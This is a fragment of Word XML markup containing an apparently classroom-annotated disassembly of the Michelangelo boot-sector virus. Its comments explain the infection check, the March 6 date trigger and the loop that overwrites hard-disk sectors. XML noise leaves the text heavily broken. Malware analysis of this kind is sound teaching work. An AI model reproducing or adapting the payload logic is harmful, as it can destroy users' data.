        <w:ind w:left="686.9440460205078" w:right="1076.72973632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CF set on error, AH = status, AL = number of sectors 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7294921875" w:line="216.5797519683838" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="1076.72973632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seg000:7D2E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jb short loc_7D3E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;jump if be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">low loc_7D3E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11914062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si, si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;clear si register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cld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;clear direction </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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lodsw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load word at address ds:si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ax, [bx]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;ax value is compared to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">memory contents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;of register bx, flag is set</w:t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loc_7D87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;jump if cmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ax, [bx] nonzero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;--&gt; else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seg000:7D20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this area serves to check for infection check by analyzing size of disk, searching for missing two kilobytes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this is indicated by operations occurring between ax value 201h and bx value 200h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this serves to check that the conditions are right to initialize seg000:7D87, which jumps to the attack protocol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seg000:7D36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lodsw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ab/>
        <w:t xml:space="preserve">;load word at address ds:si into ax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ax, [bx+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;compare ax again with new value [bx+2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00008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jnz short loc_7D87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0080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jump if cmp ax, [bx + 2] nonzero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seg000:7D23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value 201h is assigned to ax, and 200h is assigned to bx as preparation for the upcoming infection check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value 1 is assigned to cx, and 80h is assigned to dx, interrupt 13h is called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ah = 02h ([0000 0010] 0000 0001) causes sector read to occur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="2.67181396484375" w:line="216.58005237579346" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="1076.729736328125" w:firstLine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ab/>
        <w:t xml:space="preserve">AL = 0001, CH = 0000 0000 0000 0001, CL = 0001, DH = 0000 0000 1000 0000, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="2.67181396484375" w:line="216.58005237579346" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="1076.729736328125" w:firstLine="0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ab/>
        <w:tab/>
        <w:t xml:space="preserve">DL = 0000, ES:BX = 0h:7C00h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si is cleared, the direction flag is cleared, and the short word located at ds:si is loaded into register ax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the value of bx (512) is compared to value of ax (ds:si) to check for code at location 512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ditto, value of bx (514) is compared to value of ax (ds:si) to check for code at location 512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this is all to check for infection by looking for code written to the 512 - 514kb range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seg000:7D3C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loc_7D3E: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seg000:7D11j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800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seg000:7D1Cj ...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seg000:7D3E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cx, cx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;cx is cle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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ah,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value 4 is moved into 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032.11914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1Ah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CLOCK - READ DATE FROM REAL TIME CLOCK (AT,XT286,CONV,PS)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032.11914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DL = day in BCD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11914062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month in BCD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CL = year in BCD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CH = century (19h or 20h)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dx,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306h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compare value of 306h to dx (80h)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jz short loc_7D4B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;if date matches March 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,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retf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;ret</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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seg000:7D3E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cx is cleared, value 4 assigned to ah (0000 0000 0000 0100)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interrupt 1A is triggered, function 04h (read real time clock date)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ch, cl, dh, dl, and cf are returned to indicate date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given Michelangelo’s birthday (March 6th), expected dh and dl values are dh = 03h and dl = 06h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execution date formatted as 306h to indicate March 6th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dx = 0000 0011 0000 0110 indicates March 6th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cmp dx, 306h compares the value 306h to dx, checking for March 6th date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zero value on ZF indicates that it is indeed March 6th, causing jump to loc_7D4B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|</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">if zero, jump to loc_7D4B, else retf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seg000:7D4A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seg000:7D4B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800000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;this jump happens on March 6th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loc_7D4B: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seg000:7D48j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dx, dx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;clear dx register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800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seg000:7D4D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of 1 into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80000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;begin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ning of hard drive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0" w:right="0" w:firstLine="72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color w:val="800000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;physical boot sector location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loc_7D50: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seg000:7D7Fj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seg000:7D85j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309h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30</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9h into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si,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ds:8 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">into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8000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;compare 3 with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jz short loc_7D6C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;jump if zero to loc_7D6C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0Eh into al</w:t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seg000:7D5E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;compare 0Eh with si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jz short loc_7D6C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ab/>
        <w:t xml:space="preserve">;jump if zero to loc_7D6C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80h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'€'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;move value of 80h into dl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byte ptr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al,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;move value 11h into al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seg000:7D6C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loc_7D6C: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seg000:7D5Aj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seg000:7D61j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598937988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of 8 1/12/16, 2:37 PM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bx,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5000h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;move value 5000h into bx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seg000:7D6F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es, bx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;move value of bx into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assume es:nothing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WRITE SECTORS FROM MEMORY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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;reinitialize int 13h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105373382568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AL = number of sectors to write, CH = track, CL = sector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105373382568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head, DL = drive, ES:BX -&gt; buffer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08984375" w:line="216.5804100036621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CF set on error, AH = status, AL = number of sectors written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08984375" w:line="216.5804100036621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jnb short loc_7D79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508789062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ah, ah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ab/>
        <w:t xml:space="preserve">;resets controller (sets ah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RESET DISK SYSTEM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DL = drive (if bit 7 is set both hard disks and floppy disks reset)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seg000:7D4B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dx register is cleared, value of 1 is moved into cx, value of 309h is assigned to ax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value of data segment offset 8 is assigned to stack indicator, and is compared to value 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this sets up a jump if zero to loc_7D6C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else, move 0Eh value into al, and compare si to 0Eh to set up for another jump if zero to loc_7D6C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else, move value of 80h into dl, and move value 4 into byte into data segment offset 7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move value of 11h into al, and value 5000h into bx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move value of bx into es, assume es:nothing, call interrupt 13h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ax is valued at 0000 0011 0001 0001, giving ah = 0000 0011, triggering function 03h, sector write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returns carry flag set to 1, indicating error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jump if not below triggers jump to loc_7D79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|</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">else, clear ah and re-trigger interrupt 13h using cleared ah register value 0h, disk controller reset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seg000:7D77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880.12207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seg000:7D79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72949218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loc_7D79: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seg000:7D73j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inc dh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cmp dh,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;checks if floppy or har</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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seg000:7D7F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jb short loc_7D50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 xml:space="preserve">;if below 7, jump to track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;destruction locale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dh, dh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;clear data head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inc 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;increment track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short loc_7D50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000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;jump to destruction locale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seg000:7D79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if loc_7D73 jnb  short loc_7D79 is not triggered, then increment dh value returned by interrupt 13h function 0h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dh is incremented, and compared to ds:7, setting up for a jump if below to loc_7D50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else, dh is cleared, ch (disk track) is incremented, and a jump is executed to loc_7D50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Michelangelo is searching for a particular location on disk to complete interrupt 13h function 3h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this is being done to ensure the proper location is found for deployment of the virus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seg000:7D87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800000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;hard drive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loc_7D87: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CODE XREF: seg000:7D36j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seg000:7D3Cj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;store value 7 into cx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, cx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;store value of cx into ds:8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seg000:7D8E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;store value 301h into ax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80h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'€'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;store value 30h into dx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WRITE SECTORS FROM MEMORY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;interrupt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13h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AL = number of sectors to write, CH = track, CL = sector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7519683838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head, DL = drive, ES:BX -&gt; buffer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119140625" w:line="216.58005237579346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CF set on error, AH = status, AL = number of sectors written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2119140625" w:line="216.58005237579346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jb short loc_7D3E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;jump </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">short if CF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si,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3BEh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;move value 3BEh into si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di,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1BEh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;move value 1BEh into di</w:t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seg000:7D9E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cx,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ff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21h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'!'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;move value 21h into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rep movsw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 perform copy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 move 16-bits ds:si -&gt; es:di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 si++ and di++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 repeats </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cx </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">times(cx - -)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 cld causes incrementation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; std causes decrementation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80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;copy code 21h times while maintaining control of int 13h handler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mov ax,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301h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;move value 301h into ax</w:t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xor bx, bx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;clear bx register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inc cl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;increment cl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13h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DISK - WRITE SECTORS FROM MEMORY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color w:val="0000ff"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;interrupt 13h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005237579346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AL = number of sectors to write, CH = track, CL = sector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005237579346" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="2117.5585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DH = head, DL = drive, ES:BX -&gt; buffer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Return: CF set on error, AH = status, AL = number of sectors written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81396484375" w:line="216.58005237579346" w:lineRule="auto"/>
        <w:ind w:left="686.9440460205078" w:right="733.626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jmp short loc_7D3E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;jump loc_7</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">D3E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---------------------------------------------------------------------------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seg000:7D87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value 7 is stored into cx, value of cx is then stored into ds:8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301h is stored into ax, 80h is stored into dx, and interrupt 13h function 3h is called, disk write from memory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program jumps to loc_7D3E if carry flag = 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else, 3BEh is stored into si, 1BEh is stored into di, and 21h is stored into cx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rep movsw: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 xml:space="preserve">stack indicator: 3BEh</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">0011 1011 1110</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">| rep movsw carried out cx times (21h/0010 0001/33)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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">| each time </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ds:si -&gt; es:di</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, si++ &amp;&amp; di++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 xml:space="preserve">destination indicator: 1BEh</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0001 1011 1110</w:t>
        <w:tab/>
        <w:t xml:space="preserve">|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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/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after, value of 301h is moved into ax, bx is XOR’d, and the current disk sector is incremented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then, a new int 13h is called, with a jump short loc_7D3E repeating the process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data is erased through the rep movsw process, and int 13h function 3h is called again, to continue moving through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the boot sector, destroying information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  <w:t xml:space="preserve">seg000:7DAC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71966552734375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="686.944026947021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color w:val="008040"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">;empty instructions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seg000:7DAF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598937988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of 8 1/12/16, 2:37 PM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;MBR partition table begins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seg000:7DBF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seg000:7DCF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seg000:7DDF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598937988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of 8 1/12/16, 2:37 PM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IDA - /Users/golden/Work/class/4622/examples/MICHELANGELO/m.idb (m.1) file:///Users/golden/Work/class/4622/examples/MICHELANGELO/michelangelo-uncommented.html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81005859375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seg000:7DEF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seg000:7DFC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55h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U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8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db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4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0AAh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; ª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;55h / AA MBR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">boot sector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 ends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808000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seg000:7DFF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highlight w:val="white"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline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9440269470215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of 8 1/12/16, 2:37 PM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5.9356689453125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/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240" w:top="160" w:left="193.76001358032227" w:right="195.27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19.200000762939453"/>
        <w:szCs w:val="19.200000762939453"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:ind w:left="686.94402694702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